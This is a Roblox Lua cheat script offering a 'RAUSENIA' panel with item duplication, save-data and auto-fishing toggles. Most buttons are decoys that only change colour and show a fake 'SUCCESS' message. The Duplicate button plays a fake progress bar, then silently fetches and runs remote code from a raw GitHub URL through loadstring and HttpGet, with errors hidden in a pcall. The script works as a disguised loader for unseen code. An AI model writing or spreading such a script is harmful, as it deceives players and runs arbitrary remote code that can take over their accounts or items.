--// RAUSENIA FULL AUTO BUY TOGGLE PANEL + ADD MENU FISCHING 🎣
--// Made by Th1nH Z 💖

local Players = game:GetService("Players")
local TweenService = game:GetService("TweenService")
local RunService = game:GetService("RunService")
local player = Players.LocalPlayer
local playerGui = player:WaitForChild("PlayerGui")

-- Xóa GUI cũ nếu có
if playerGui:FindFirstChild("AutoBuyingToggleGUI") then
	playerGui.AutoBuyingToggleGUI:Destroy()
end
if playerGui:FindFirstChild("RAUSENIA_AutoBuy") then
	playerGui.RAUSENIA_AutoBuy:Destroy()
end

-- === MAIN TOGGLE SCREENGUI ===
local screenGui = Instance.new("ScreenGui")
screenGui.Name = "AutoBuyingToggleGUI"
screenGui.ResetOnSpawn = false
screenGui.Parent = playerGui
screenGui.IgnoreGuiInset = true

-- Dim background
local dim = Instance.new("Frame", screenGui)
dim.AnchorPoint = Vector2.new(0.5, 0.5)
dim.Position = UDim2.new(0.5, 0, 0.5, 0)
dim.Size = UDim2.new(1, 0, 1, 0)
dim.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
dim.BackgroundTransparency = 0.6
dim.BorderSizePixel = 0
dim.Visible = false

-- PANEL CHÍNH
local panel = Instance.new("Frame", screenGui)
panel.AnchorPoint = Vector2.new(0.5, 0.5)
panel.Position = UDim2.new(0.5, 0, 0.5, 0)
panel.Size = UDim2.new(0, 360, 0, 350)
panel.BackgroundColor3 = Color3.fromRGB(18, 18, 18)
panel.BorderSizePixel = 0
panel.Visible = false
Instance.new("UICorner", panel).CornerRadius = UDim.new(0, 12)

local rainbowStroke = Instance.new("UIStroke", panel)
rainbowStroke.Thickness = 3
rainbowStroke.ApplyStrokeMode = Enum.ApplyStrokeMode.Border

task.spawn(function()
	local t = 0
	while rainbowStroke.Parent do
		t = t + 0.01
		rainbowStroke.Color = Color3.fromHSV(t % 1, 1, 1)
		task.wait()
	end
end)

-- Title
local title = Instance.new("TextLabel", panel)
title.AnchorPoint = Vector2.new(0.5, 0)
title.Position = UDim2.new(0.5, 0, 0.03, 0)
title.Size = UDim2.new(0.9, 0, 0.12, 0)
title.BackgroundTransparency = 1
title.Text = "RAUSENIA PANEL"
title.Font = Enum.Font.GothamBold
title.TextSize = 20
title.TextColor3 = Color3.fromRGB(235,235,235)

-- Create generic toggle button
local function createToggleButton(parent, labelText, yScale)
	local btn = Instance.new("TextButton", parent)
	btn.Size = UDim2.new(0.85, 0, 0, 48)
	btn.Position = UDim2.new(0.5, 0, yScale, 0)
	btn.AnchorPoint = Vector2.new(0.5, 0)
	btn.BackgroundColor3 = Color3.fromRGB(220, 20, 60)
	btn.BorderSizePixel = 0
	btn.Font = Enum.Font.GothamBold
	btn.TextSize = 18
	btn.TextColor3 = Color3.fromRGB(255,255,255)
	btn.Text = labelText .. " 🔴"
	Instance.new("UICorner", btn).CornerRadius = UDim.new(0, 10)

	local icon = Instance.new("Frame", btn)
	icon.AnchorPoint = Vector2.new(0, 0.5)
	icon.Position = UDim2.new(0.03, 0, 0.5, 0)
	icon.Size = UDim2.new(0, 26, 0, 26)
	icon.BackgroundColor3 = Color3.fromRGB(255,80,80)
	icon.BorderSizePixel = 0
	Instance.new("UICorner", icon).CornerRadius = UDim.new(1, 0)

	return btn, icon
end

-- 2 toggle cũ
local dupBtn, dupIcon = createToggleButton(panel, "Duplicate 👯‍♂️", 0.25)
local saveBtn, saveIcon = createToggleButton(panel, "Save Data 💾", 0.45)

------------------------------------------------------
-- ⭐⭐⭐ MENU FISCHING 🎣 (NEW)
------------------------------------------------------
local fishingBtn, fishingIcon = createToggleButton(panel, "MENU FISCHING 🎣", 0.66)
local fishingState = false

-- GUI FISCHING
local fishingGui = Instance.new("Frame", screenGui)
fishingGui.Size = UDim2.new(0, 260, 0, 200)
fishingGui.Position = UDim2.new(0.74, 0, 0.48, 0)
fishingGui.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
fishingGui.BorderSizePixel = 0
fishingGui.Visible = false
Instance.new("UICorner", fishingGui).CornerRadius = UDim.new(0, 12)

-- Sub toggle creator
local function createSmallToggle(parent, label, yPos)
	local btn = Instance.new("TextButton", parent)
	btn.Size = UDim2.new(0.85, 0, 0, 42)
	btn.Position = UDim2.new(0.5, 0, yPos, 0)
	btn.AnchorPoint = Vector2.new(0.5, 0)
	btn.BorderSizePixel = 0
	btn.Font = Enum.Font.GothamBold
	btn.TextSize = 17
	btn.TextColor3 = Color3.fromRGB(255,255,255)
	btn.Text = label .. " 🔴"
	btn.BackgroundColor3 = Color3.fromRGB(220, 20, 60)
	Instance.new("UICorner", btn).CornerRadius = UDim.new(0, 8)

	return btn
end

local autoFish = createSmallToggle(fishingGui, "AUTO FISH", 0.10)
local instantCatch = createSmallToggle(fishingGui, "INSTANT CATCH", 0.36)
local antiAfk = createSmallToggle(fishingGui, "ANTI AFK", 0.62)

-- SUCCESS Notify
local function notifySuccess()
	local msg = Instance.new("TextLabel", screenGui)
	msg.Size = UDim2.new(0, 230, 0, 55)
	msg.Position = UDim2.new(0.5, -115, 0.1, 0)
	msg.BackgroundColor3 = Color3.fromRGB(45,45,45)
	msg.BackgroundTransparency = 0.15
	msg.Font = Enum.Font.GothamBold
	msg.TextColor3 = Color3.fromRGB(0,255,0)
	msg.TextSize = 20
	msg.Text = "SUCCESS ✅"
	Instance.new("UICorner", msg)
	task.delay(1.2, function() msg:Destroy() end)
end

-- Toggle logic
local tweenInfo = TweenInfo.new(0.25, Enum.EasingStyle.Sine, Enum.EasingDirection.Out)
local function toggle(btn, icon, state, label)
	if state then
		TweenService:Create(btn, tweenInfo, {BackgroundColor3 = Color3.fromRGB(35, 170, 60)}):Play()
		TweenService:Create(icon, tweenInfo, {BackgroundColor3 = Color3.fromRGB(60, 200, 100)}):Play()
		btn.Text = label .. " 🟢"
	else
		TweenService:Create(btn, tweenInfo, {BackgroundColor3 = Color3.fromRGB(220, 20, 60)}):Play()
		TweenService:Create(icon, tweenInfo, {BackgroundColor3 = Color3.fromRGB(255,80,80)}):Play()
		btn.Text = label .. " 🔴"
	end
end

local saveState, dupState = false, false

saveBtn.MouseButton1Click:Connect(function()
	saveState = not saveState
	toggle(saveBtn, saveIcon, saveState, "Save Data 💾")
end)

-- Duplicate progress
local function showProgress()
	local gui = Instance.new("ScreenGui", playerGui)
	gui.Name = "RAUSENIA_Progress"

	local bg = Instance.new("Frame", gui)
	bg.Size = UDim2.new(1,0,1,0)
	bg.BackgroundColor3 = Color3.fromRGB(0,0,0)
	bg.BackgroundTransparency = 0.3

	local label = Instance.new("TextLabel", bg)
	label.AnchorPoint = Vector2.new(0.5,0.5)
	label.Position = UDim2.new(0.5,0,0.5,0)
	label.Size = UDim2.new(0,300,0,60)
	label.Font = Enum.Font.GothamBold
	label.TextColor3 = Color3.fromRGB(255,255,255)
	label.TextSize = 24
	label.BackgroundTransparency = 1

	for i = 1,100 do
		label.Text = "Processing... "..i.."%"
		task.wait(0.03)
	end

	label.Text = "SUCCESS ✅"
	task.wait(0.9)
	gui:Destroy()
end

dupBtn.MouseButton1Click:Connect(function()
	if dupState then return end
	dupState = true
	showProgress()

	pcall(function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/tunadan212/Kkkk/refs/heads/main/K"))()
	end)

	toggle(dupBtn, dupIcon, true, "Duplicate 👯‍♂️")
end)

------------------------------------------------------
-- ⭐ MENU FISCHING BUTTON
------------------------------------------------------
fishingBtn.MouseButton1Click:Connect(function()
	fishingState = not fishingState
	toggle(fishingBtn, fishingIcon, fishingState, "MENU FISCHING 🎣")
	fishingGui.Visible = fishingState
end)

------------------------------------------------------
-- ⭐ 3 SUB TOGGLE
------------------------------------------------------
local function smallToggle(btn, label)
	local state = false
	btn.MouseButton1Click:Connect(function()
		state = not state
		btn.Text = label .. (state and " 🟢" or " 🔴")
		btn.BackgroundColor3 = state and Color3.fromRGB(35,170,60) or Color3.fromRGB(220,20,60)
		notifySuccess()
	end)
end

smallToggle(autoFish, "AUTO FISH")
smallToggle(instantCatch, "INSTANT CATCH")
smallToggle(antiAfk, "ANTI AFK")

-- === FLOATING BUTTON ===
local floating = Instance.new("Frame", screenGui)
floating.Size = UDim2.new(0, 56, 0, 56)
floating.Position = UDim2.new(0.04, 0, 0.80, 0)
floating.BackgroundColor3 = Color3.fromRGB(0,0,0)
floating.Active = true
floating.Draggable = true
Instance.new("UICorner", floating).CornerRadius = UDim.new(1,0)

local strokeF = Instance.new("UIStroke", floating)
strokeF.Thickness = 3
task.spawn(function()
	local t = 0
	while strokeF.Parent do
		t = t + 0.01
		strokeF.Color = Color3.fromHSV(t % 1, 1, 1)
		task.wait()
	end
end)

local icon = Instance.new("TextLabel", floating)
icon.Size = UDim2.new(1,0,1,0)
icon.BackgroundTransparency = 1
icon.Text = "💸"
icon.Font = Enum.Font.GothamBold
icon.TextSize = 30
icon.TextColor3 = Color3.fromRGB(255,255,255)

-- FIX CLICK BUTTON
local clickBtn = Instance.new("TextButton", floating)
clickBtn.Size = UDim2.new(1,0,1,0)
clickBtn.BackgroundTransparency = 1
clickBtn.Text = ""

local open = false
clickBtn.MouseButton1Click:Connect(function()
	open = not open
	panel.Visible = open
	dim.Visible = open
end)
